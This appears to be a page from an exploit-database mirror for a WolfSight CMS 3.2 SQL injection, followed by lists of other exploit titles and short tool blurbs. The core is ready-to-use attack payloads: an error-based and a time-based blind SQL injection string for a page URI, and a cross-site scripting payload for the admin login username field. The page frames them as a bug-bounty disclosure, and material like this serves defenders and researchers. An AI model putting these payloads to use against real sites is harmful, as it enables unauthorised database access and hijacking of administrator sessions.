Menu

Search for hundreds of thousands of exploits

"WolfSight CMS 3.2 - SQL Injection"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

php

Release date

Exploit published date

2018-07-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: WolfSight CMS 3.2 - SQL Injection
# Google Dork: N/A
# Date: 2018-07-10
# Exploit Author: Berk Dusunur & Zehra Karabiber
# Vendor Homepage: http://www.wolfsight.com
# Software Link: http://www.wolfsight.com
# Version: v3.2
# Tested on: Parrot OS / WinApp Server
# CVE : N/A

# PoC Sql Injection
# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: 

http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx

# PoC Cross-Site Scripting
# http://ip/admin/login.php
# Username

<IMG SRC=javascript:alert(EZK);>

# This vulnerability was identified during bug bounty
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-28 "NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection" webapps multiple "Berk Dusunur"
2020-05-28 "Online-Exam-System 2015 - 'fid' SQL Injection" webapps php "Berk Dusunur"
2020-01-29 "Liferay CE Portal 6.0.2 - Remote Command Execution" webapps java "Berk Dusunur"
2018-10-29 "Grapixel New Media 2 - 'pageref' SQL Injection" webapps php "Berk Dusunur"
2018-08-23 "PCViewer vt1000 - Directory Traversal" webapps windows "Berk Dusunur"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-23 "Synology DiskStation Manager 4.1 - Directory Traversal" webapps linux "Berk Dusunur"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-16 "WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-07-10 "WolfSight CMS 3.2 - SQL Injection" webapps php "Berk Dusunur"
2018-06-28 "hycus CMS 1.0.4 - Authentication Bypass" webapps php "Berk Dusunur"
2018-06-22 "phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)" webapps php "Berk Dusunur"
2018-06-20 "NewMark CMS 2.1 - 'sec_id' SQL Injection" webapps linux "Berk Dusunur"
2018-06-18 "Redatam Web Server < 7 - Directory Traversal" webapps windows "Berk Dusunur"
2018-05-21 "Zenar Content Management System - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-05-18 "Monstra CMS < 3.0.4 - Cross-Site Scripting (2)" webapps php "Berk Dusunur"
2018-03-26 "Acrolinx Server < 5.2.5 - Directory Traversal" remote windows "Berk Dusunur"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.